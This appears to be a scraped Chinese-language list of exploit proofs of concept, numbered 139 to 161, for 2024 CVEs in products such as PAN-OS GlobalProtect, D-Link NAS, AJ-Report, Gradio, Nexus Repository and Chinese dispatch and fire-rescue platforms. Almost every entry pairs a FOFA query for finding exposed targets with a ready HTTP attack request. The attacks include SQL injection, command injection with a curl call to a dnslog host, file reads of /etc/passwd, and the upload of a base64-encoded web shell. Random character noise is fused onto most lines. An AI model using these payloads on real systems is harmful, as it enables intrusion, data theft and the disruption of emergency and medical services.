User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ R- N* H5 k% a: v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ k* k& Y$ z2 W8 a# o$ A9 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% R5 k+ O8 O  e7 U- jAccept-Encoding: gzip, deflate, br
  \7 E# g1 L2 ?) C- [Connection: close7 y  X8 C& u2 ~5 r. G7 }& q, J9 Y
Upgrade-Insecure-Requests: 1! y' E* l- r6 R  V  }* t9 o) V: c1 l
7 b% W2 c2 j9 l+ A) Z( I5 S
6 l: t2 J$ w% w. J- b! a
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
% o& \- b" e7 R; }+ q3 _* [CVE-2024-2622
2 G5 A# |- U$ y* AFOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
5 w0 ~; X/ q# ]  B: h) x$ L/ N5 ZGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1( t8 J- X: K! Z( R
Host: x.x.x.x% p1 ?; X8 V: r+ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 A( {# Q; b* gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 t/ X; U: A* IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' z# w7 w9 t2 n6 m
Accept-Encoding: gzip, deflate, br  [/ x; B. p. |/ d% @: s
Connection: close
0 G0 j* `6 A# D4 nCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
! G$ z8 \/ b: o. @. A! aUpgrade-Insecure-Requests: 1
1 ~: h; L+ f' T: W& }& u$ ]2 P+ h- p. _- v4 S, H- [

1 |( d7 h" D" q( o; s/ `+ H# G140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
0 b9 M5 _. m# U. J$ r) n, PCVE-2024-2566* ~3 H7 m0 Y6 |  _1 ?& R: k, U
FOFA：body="app/structure/departments.php" || app="指挥调度管理平台"
1 M8 _8 R& S9 N) }) J* mGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
3 y# _- {& z# uHost: x.x.x.x
# u' p1 L0 \6 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! x) Z3 M4 ^% a, `. |) v* X+ {5 Y3 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& U" v2 ?0 e5 ]) P2 Z- t# rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& T9 p6 e: m, b3 ]1 AAccept-Encoding: gzip, deflate, br' k* R& \# A+ I2 t; B
Connection: close4 i) }) [& Q) i8 Q. \7 J. Z
Cookie: authcode=h8g9; }0 h6 Q: R  V. Y- L) @* }& U
Upgrade-Insecure-Requests: 1
- i, x, g/ X+ F$ }& q% _% f  e1 ~! Q& E  W8 W9 c

" u& j- N2 k; m, q# t. d7 i141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入% w% ~8 E; @8 s0 X" t" u# W% y9 }
FOFA：body="指挥调度管理平台"
) g: {! x; D, U& C( Z, O7 S( ]POST /app/ext/ajax_users.php HTTP/1.1% }; x, W: O/ d) K! ]4 h
Host: your-ip( Y) Z" C! ?3 U8 c- L; b7 q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
* Y# r2 S2 y1 bContent-Type: application/x-www-form-urlencoded, s3 }( d- g6 @* d1 s

, k5 k" J: k) j; L! k( @( w$ A( z6 Y
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -- N# R: q; i( v: g

5 J5 h$ X9 i& ?3 s
5 h2 i' x' D, C# H) N9 c* P; h142. CMSV6车辆监控平台系统中存在弱密码# E9 _9 `( ?- j* {
CVE-2024-29666" T2 ?# f# I3 I' }* ^
FOFA：body="/808gps/"
5 b) P$ Z8 H, U0 v$ Y& K4 ~admin/admin
- w& r  f: C* r( b- y! _143. Netis WF2780 v2.1.40144 远程命令执行: J3 ^* a0 ?5 ]
CVE-2024-25850
( P2 H6 T( ?9 M2 ]FOFA：title='AP setup' && header='netis'
/ a6 k- d7 p4 h- ^- o  A* j$ fPAYLOAD
) j' s7 f+ m+ z. \; [: p9 }" _' V6 d/ I3 t
144. D-Link nas_sharing.cgi 命令注入
7 V% Y3 W0 s& o. G$ uFOFA：app="D_Link-DNS-ShareCenter"; `$ U8 R9 W0 b# s. k# f
system参数用于传要执行的命令+ v" b9 Z- g  B4 ?& f/ M
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.11 l! h, {+ D+ |( ]* ]- k6 P- w) `
Host: x.x.x.x
4 K  Z! t: n4 X3 v/ Y: W/ k+ _User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
9 Z& ?0 j6 V4 R: f2 FConnection: close- |" y6 R$ T7 R! C# n
Accept: */*% b9 V* x0 w$ S" G
Accept-Language: en
Accept-Encoding: gzip
; K( |. Y9 V* B1 P% X! A7 A/ \  s) h9 x: K  F* [

- ]: Y+ R  K7 T# O# |+ x145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
5 [/ I; e: j! pCVE-2024-3400
8 O, i3 g2 n7 p3 d  h1 k/ L$ pFOFA：icon_hash="-631559155"
* V3 \: u4 J0 Q! n1 ?+ s5 |; Y% yGET /global-protect/login.esp HTTP/1.1& Z& a0 C, r1 Q
Host: 192.168.30.112:10051 i. I0 T* N' F) ~4 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' w- T3 J9 J* ]2 |Connection: close6 [/ p) C  B* o0 f2 B
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
& y) i' a# ?. c1 K! Z! a0 K0 mAccept-Encoding: gzip4 u/ w2 V" ~2 l6 l
# T, V! S/ ~$ i* ^2 I! m

# v  e& W+ I8 k, k$ U- J146. MajorDoMo thumb.php 未授权远程代码执行/ E2 k$ T& Z& Q- b* w6 j9 i
CNVD-2024-02175
4 u# T5 @0 x1 W. b; i+ I+ ^7 hFOFA：app="MajordomoSL"
: A* h$ {- O# cGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
2 p: J+ O" W" ?  h: Y& e2 y% {: KHost: x.x.x.x
0 |3 U+ |# Z; r( D! i: [  UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84; J5 M0 b" |4 `0 a7 Q
Accept-Charset: utf-80 D: H: ^3 e$ O
Accept-Encoding: gzip, deflate3 L7 d5 h6 l( a5 ?5 ^
Connection: close
- b' J6 i# j( [7 H" b' a- G2 x
; m& c+ E* [: V3 j; o3 t5 o5 j" o  d( ~; y# v6 p
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
* M0 P# m- r" w" V; Q" r+ S" vCVE-2024-32399
* X) @% }) c6 w# `( i( k- xFOFA：body="RaidenMAILD") F! c' R8 ^' ]% }
GET /webeditor/../../../windows/win.ini HTTP/1.1
* ^+ b3 W# f- \) R3 G0 l7 z: JHost: 127.0.0.1:81
Cache-Control: max-age=0
' d# v2 p& S: D3 l* t  AConnection: close
/ H+ M6 z. x7 R! k7 f( S  ~  @  L) L. f' b4 V

0 ?  b. C4 q% ~) y9 l148. CrushFTP 认证绕过模板注入
8 D: ]" _+ s$ c* j) x/ V' ECVE-2024-4040
5 ^7 i. C7 M: @' OFOFA：body="CrushFTP") T! D2 O5 W" Y% {  R3 a& l* j
PAYLOAD
  O3 U0 L+ |9 m% u& r
, L1 s% ?7 j0 E1 [+ Y149. AJ-Report开源数据大屏存在远程命令执行; _. E3 X# f9 v  [" z2 ~
FOFA：title="AJ-Report". ?0 M. \3 M6 M% j
& p# D( i7 a3 t& I: D: b' O
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 j4 Y9 ^- r* \" \! _Host: x.x.x.x
* ~" q4 N2 V, r) J+ u0 p$ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) c0 R) E- I# h  u  t& b5 r- R! I; B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! M& b& [! M4 e( E6 j
Accept-Encoding: gzip, deflate, br
3 Z( N+ f; U" nAccept-Language: zh-CN,zh;q=0.98 c% o0 V  k7 G, D( e
Content-Type: application/json;charset=UTF-86 j* N5 C1 Z' n
Connection: close
) r& e! L% p6 T
6 g/ O+ U! A- N  a{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}) w8 P! Z1 m) I& M9 u4 h" _
( e3 e: O  @3 V# f3 N6 P
150. AJ-Report 1.4.0 认证绕过与远程代码执行$ a& m5 D) @( S: M
FOFA：title="AJ-Report"
) B' [) J; m, _; Z, A7 fPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1% S' Y) p9 f- z% B
Host: x.x.x.x) l0 r+ k8 B- i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ i$ h9 ]- [: [, u( b0 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ ]' S- p0 i6 D, O: oAccept-Encoding: gzip, deflate, br& q0 s. E6 \& i/ u' h# q0 C
Accept-Language: zh-CN,zh;q=0.9
. t8 Z9 B+ i3 ?. K  p) EContent-Type: application/json;charset=UTF-8( Q0 n  n! f" Z( y) }8 [
Connection: close) ]- C1 s/ U7 r2 I4 F5 i( }
Content-Length: 339
+ n1 R" O( R) p' I, ^9 i$ E" b6 d# @3 I* @( o/ E# V' b. R& f. Y
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}, j" L4 b( e/ M1 K- b

% G( v- U; H2 K. W
) G/ C0 `& E5 D$ u6 W151. AJ-Report 1.4.1 pageList sql注入4 A" p" Y3 H5 h: s& t/ }. b
FOFA：title="AJ-Report"
8 m6 _9 O$ O' Q' }GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.14 t) ~& c7 b, M# w
Host: x.x.x.x! ~7 ~5 \) W  ~1 o, k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( Q- _9 U# m2 @- g4 T$ T$ D7 Q
Connection: close4 p  \1 m: c% D% i
Accept-Encoding: gzip% d) f, N: D; k- m# \: l

: l( }! y* W% Y* o/ z# t% M' t. J" \) J0 C% Z" k: o! i* E0 P- F
152. Progress Kemp LoadMaster 远程命令执行
5 ]/ a( v7 v( r, `; O5 R' c2 C3 o  ~CVE-2024-12128 d4 b8 C+ h: _6 l5 j
LoadMaster <= 7.2.59.2 (GA)+ @; \, n! N2 h% v* m8 e' P
LoadMaster<=7.2.54.8 (LTSF)0 \7 \: o! x$ _( J8 R! C
LoadMaster <= 7.2.48.10 (LTS)3 H4 `0 T! Q8 G  q5 `, p9 I: L
FOFA：body="LoadMaster"' }+ H9 y8 N% x7 d8 a7 a
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码3 P9 h3 X; r  b$ }3 S0 j4 B
GET /access/set?param=enableapi&value=1 HTTP/1.1/ n+ Y$ P0 P9 l* o0 F0 D! o
Host: x.x.x.x' L2 {" G) f/ W1 V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1, z; D6 _' i- j( h" A
Connection: close
5 b# V- x7 H. H% BAccept: */*
- t& R: F9 _7 R9 bAccept-Language: en
( l, w5 k. S1 S: \) Y# qAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=0 y7 f: v; ^/ S
Accept-Encoding: gzip
4 c0 H( }5 M6 H& `$ _4 Y! V7 n. a
* F5 c6 P% n6 ?
153. gradio任意文件读取" O( _" Z. \+ W
CVE-2024-1561FOFA：body="__gradio_mode__"2 T+ c" ~* U) }& J+ q
第一步，请求/config文件获取componets的id
  \( l6 i3 U6 o* ?. V6 `" k3 ]9 ]% `http://x.x.x.x/config9 {/ v4 R$ d- f( b5 q9 r) h) x
9 q4 q/ M  L8 Y& h4 V% m# j

+ `0 {! ~) f# E& G第二步，将/etc/passwd的内容写入到一个临时文件
/ ]% S3 {6 T% Y! F* mPOST /component_server HTTP/1.1
* u9 o/ v, G4 m: oHost: x.x.x.x
' X( H4 H4 H# Z8 r6 M% r0 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
2 g* t3 v, s0 W2 D1 cConnection: close
' O5 A( m# W8 K+ {( e% ~Content-Length: 115
- w5 @4 A$ r% Z' IContent-Type: application/json
( j- ]( q; c& r3 s' m0 x  TAccept-Encoding: gzip
# j3 r# Q7 n, [! ?, o0 A/ i% b6 Y
. q+ U: Q: I3 [4 l{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}% V% Y! C( `- }# J3 n

* }" z1 j" a5 w9 ?2 P$ z
, i9 {/ G' T2 H. P  }第三步访问
" K, P7 q- p: Dhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
- L+ R4 w" f3 @( ~  u2 Y2 P" i5 t) {" b2 G. E# I- S. z" B

& r( Z4 Y; C# f) e154. 天维尔消防救援作战调度平台 SQL注入
8 s, Q1 |0 u8 E& VCVE-2024-3720FOFA：body="天维尔信息科技股份有限公司" && title=="登入"1 w! ^& O: V' V$ W$ ?
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
: ]& [. a" G9 |. ~2 C/ {Host: x.x.x.x
; k7 r4 C4 W) QContent-Length: 106
4 q- `" F0 W2 h  _# r4 c4 aCache-Control: max-age=0
* Z0 M3 w/ r2 I& j+ eUpgrade-Insecure-Requests: 1
1 x0 [* ]# k8 g. ]3 AOrigin: http://x.x.x.x& V! N! g. p9 B0 b6 r
Content-Type: application/json
1 l1 u; V: F7 c. pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
3 D$ f7 j+ v7 t' W% r/ nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  r$ i5 e" p; X; ?9 XReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
+ S3 L2 y' c. \+ J8 m) bAccept-Encoding: gzip, deflate5 y& i$ C9 M" R) e
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
/ H2 k: R& K/ R, M! H; [  zConnection: close* _) Y$ o* p) N$ g! h" s  f
" @$ t/ u1 }! m$ U' {
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
9 a! R* g! l; `2 ~7 q8 J/ F0 E9 {1 c0 Q
6 ~6 h  c3 p  r( I: S
155. 六零导航页 file.php 任意文件上传  ^4 m2 a; [2 K; \8 ~' j
CVE-2024-34982
4 h- X$ ]2 P) DFOFA：title=="上网导航 - LyLme Spage"
& `5 `/ V) I. X# r* L4 `POST /include/file.php HTTP/1.1. ^) D3 J: ]* y  {$ l/ L
Host: x.x.x.x# I) A4 Y; B  Y* I5 j" |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 I/ s6 e6 Y! A" qConnection: close9 ]5 R7 W% q% _6 `  m5 D1 Q( y
Content-Length: 232! G: X# _6 K" z* ]
Accept: application/json, text/javascript, */*; q=0.01, {+ B4 U- }- x% d0 j. v* h
Accept-Encoding: gzip, deflate, br
# x) R( i: T% |. NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# v7 Q' I  M% R' }Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f7 n. [% D; S% }) [! Y
X-Requested-With: XMLHttpRequest
* ]4 [$ F& V/ d7 g
4 ~' D$ ~7 I9 R, s. x9 L# p& H-----------------------------qttl7vemrsold314zg0f
$ v% m. c( `# _  g3 \7 Z7 H' N& X# GContent-Disposition: form-data; name="file"; filename="test.php"$ O% y5 G  ~# R6 E) |
Content-Type: image/png4 x- N+ p6 m# e& V' I8 ^. e
3 j" \! J% c! w& D2 H
<?php phpinfo();unlink(__FILE__);?>  {/ W& i: d# U& k1 E" Y9 l
-----------------------------qttl7vemrsold314zg0f--
8 A& f. x& Z1 s+ d6 A- ]
1 q6 O# V& q1 `5 e6 h7 Y! o% D4 }! G9 P5 P9 g- o
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
  v4 R( K% ^6 n3 i& ^
: g' w+ M' j$ P: h) s+ L, R; X156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ z& G( H2 J( O: L6 D+ O: \CVE-2024-3721! k6 t1 N! L& m$ n: g- {
FOFA："Location: /login.rsp"
( ~6 w5 t# |- C·TBK DVR-41049 e& H0 f4 a5 q4 D) P
·TBK DVR-4216
8 r, o$ ~8 v; R1 n9 I$ jcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"0 o: A1 C- v6 g* Y% E8 e3 f
  e/ T6 |" h9 {6 M) K6 {/ ~
- d; j9 j7 {7 n6 y/ C0 p6 }
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
' v5 g; K1 r+ t: G! g  MHost: x.x.x.x
6 _9 A5 e$ ~; z" q) S8 fUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. a) J0 I9 E+ uConnection: close
0 {& E( I) v9 e$ ^+ B" PContent-Length: 03 D/ A7 S0 u. s" j% b% `
Cookie: uid=1
8 J- O( j: y& q8 f& JAccept-Encoding: gzip
( M6 L. O/ q1 D+ d  ]5 `
, M7 F7 k* J9 S' k$ I" |& j9 a
, I3 h: d" _' `5 Z157. 美特CRM upload.jsp 任意文件上传
( g1 R$ x) u9 H7 Q  S) `CNVD-2023-06971
5 j$ m. J$ m5 B8 O$ [+ u1 ^FOFA：body="/common/scripts/basic.js"( E- M: f! g9 H+ z4 q" T0 m
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
! h8 I9 K- I. V4 T- i( xHost: x.x.x.x& V1 ~( e4 @. a1 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( X! `) l' `* S8 ~, [4 D
Content-Length: 709' H* h* t" Y2 z  O$ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# y% X! Q9 T* l; T  vAccept-Encoding: gzip, deflate  q  F; a/ h( f0 b1 E$ z
Accept-Language: zh-CN,zh;q=0.9
, ]0 H9 U: _0 g  yCache-Control: max-age=0
3 l- r& I2 I( R! ~: X2 DConnection: close
1 n: M0 y6 v9 d1 Q/ F/ AContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN9 n1 H3 p' T# N6 P7 |3 L: r
Upgrade-Insecure-Requests: 1
8 I  N+ m$ z% u, l$ T; V  x4 o# u4 v# q5 R% P
------WebKitFormBoundary1imovELzPsfzp5dN
1 h0 E# u5 x" ]* o, K5 VContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
. A/ V% G5 q1 H- v# lContent-Type: application/octet-stream+ O# Y( t2 c; O. V3 m& i# r* G7 A/ Y# z
6 M! ?" F' O$ U
nyhelxrutzwhrsvsrafb* M( R1 r% b2 w
------WebKitFormBoundary1imovELzPsfzp5dN! M) l7 s' n) N1 A3 B0 v1 E
Content-Disposition: form-data; name="key"
, W. l6 m& I. Y) ~9 S5 A' B' p# P) T5 \- H
null
( X# x/ b% V" T" X. G2 o5 N  c------WebKitFormBoundary1imovELzPsfzp5dN- w) l' w$ ?' T" k: _7 }& {
Content-Disposition: form-data; name="form"* v9 Z" K9 g/ g9 B6 J. `# I

0 V' o: P7 q3 |. tnull
- L3 E3 A0 j3 U8 Z6 Y3 F------WebKitFormBoundary1imovELzPsfzp5dN5 ], Z0 Q$ q% F* F. v; A- d
Content-Disposition: form-data; name="field". [! `$ l8 W1 [
4 i9 ~3 D( N! h, q& s" ~& ~" t
null
( ^/ k# j! d' w; A. `3 d9 k------WebKitFormBoundary1imovELzPsfzp5dN/ q( ~" k; u7 G% T/ w
Content-Disposition: form-data; name="filetitile"
) o+ E5 i6 e4 }8 _/ `8 z* D! e& x: J* A$ Q# H8 I
null! l  n% a9 f9 ^/ M
------WebKitFormBoundary1imovELzPsfzp5dN
% ~6 c6 B& x# V$ D4 K4 RContent-Disposition: form-data; name="filefolder"
& t4 Q4 r" ]* x& O0 i1 u, g( r! I# D: L7 ?( c0 g; L
null+ ]' c3 J- N4 c( S" v: D
------WebKitFormBoundary1imovELzPsfzp5dN--
# M. x2 J2 X# Y( P0 }7 U% O8 j& r4 c9 N9 Q3 X) z2 s) s
' I" Q* v; H" N$ N& }$ P
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
2 H' g* U; d. O+ p+ `/ d1 \$ T
0 @/ s" m% I" I" p+ G  I' T158. Mura-CMS-processAsyncObject存在SQL注入
: V3 p5 A/ `( X4 D/ ?CVE-2024-32640
" S; x" A% _% p$ RFOFA："Generator: Masa CMS"
% ~, s6 {7 e1 D( ]1 G  h& E5 LPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1! a3 _3 j3 c; r" x$ K
Host: {{Hostname}}
# E" N, F: D6 i& B: P8 \Content-Type: application/x-www-form-urlencoded
3 B# r/ C* E* r2 o  n( s/ a8 Q' q' {9 C7 E$ ~( B/ V) D5 F
object=displayregion&contenthistid=x\'&previewid=1
! ?$ I+ U0 o$ U9 _- J+ c" o& ?5 ]! t7 U/ z( d( Y
; D! a" F" a* U( r+ T& Q
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
  Z/ K( W3 A  e3 kFOFA："INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
1 l- L  E* ?# H3 o7 o2 aPOST /webservices/WebJobUpload.asmx HTTP/1.1; \7 i8 W/ ~; c/ j
Host: x.x.x.x
9 S: ]/ `  i: a' ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
8 L6 Y" k. o: A/ Q6 M7 nContent-Length: 1080
( u+ l0 K1 F" z2 {( S% L. A( PAccept-Encoding: gzip, deflate7 L" g; l: L! P) E1 j- }8 R: X5 ]
Connection: close
4 ?3 _- f" `6 KContent-Type: text/xml; charset=utf-8; Y. T( V% u, c4 r
Soapaction: "http://rainier/jobUpload"
5 w5 Q' s1 N+ a. \8 P
% r' r: t# }2 z/ D1 |5 Z7 y6 t% y  w<?xml version="1.0" encoding="utf-8"?>
# X0 @! ?: b+ B9 ?& J# I/ F<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
% b- E% U) Q. l<soap:Body>. ?% ^# t# A4 y7 Q" r0 U/ @
<jobUpload xmlns="http://rainier"># b5 U) B  ?3 J* N( c; Y
<vcode>1</vcode>2 U9 j+ }8 N, g. \; R& S
<subFolder></subFolder>
* \# I# P; g: r1 Y$ c1 \  b<fileName>abcrce.asmx</fileName>2 n9 s8 I9 j/ a- V! t, ?
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>3 u9 Z( A1 a6 j8 r7 w0 k
</jobUpload>
, B" V, R7 t; w" T/ f: M</soap:Body>9 c7 Z4 H, Q$ G* a% M9 k3 e* s
</soap:Envelope>
& d  o% S4 Q# w8 l0 ^
* A/ n  K, @8 e2 Z% B, y
" B/ F1 M3 S3 Y1 L8 J3 ]1 u/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
3 \, k0 k+ X' J# U' o- @. ^- K) z3 ?

9 ~2 b$ J( H5 ~' L! c160. Sonatype Nexus Repository 3目录遍历与文件读取5 a7 A( s. e  o/ U
CVE-2024-4956
3 ?/ e( O6 z: P# U1 A- X- rFOFA：title="Nexus Repository Manager"
/ ^/ ?: A3 i" D, z, p2 }3 g# pGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.11 e% E' M7 k1 N5 i" I5 q$ ~8 y8 {
Host: x.x.x.x. y, f& u! C5 x- V! t# Q1 i$ p6 }
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
' f0 D; G$ k! f' G3 FConnection: close
# ]3 ?1 x+ x3 p, x( H, i& m% C& hAccept: */*. s+ T3 }; e3 o! V/ B$ f4 `6 w  \
Accept-Language: en7 i, m: |* Q. T. A  @
Accept-Encoding: gzip0 r' {$ X5 f' H  o& i# p

& ^6 H8 R! v# Q# E7 f+ a. a$ \+ g/ c4 x% s0 L! H& F# [1 P
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
  y" @, q- p/ w2 f% tFOFA：body="/KT_Css/qd_defaul.css"
: C' g0 A2 W7 w( A第一步，上传文件<fileName>字段指定文件名，<fileFlow>字段指定文件内容，内容需要base64加密" a2 `" \' Z0 X) G
POST /Webservice.asmx HTTP/1.1* I9 b) s" E- F! X3 R: E& W
Host: x.x.x.x# H& [) i; q; d7 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
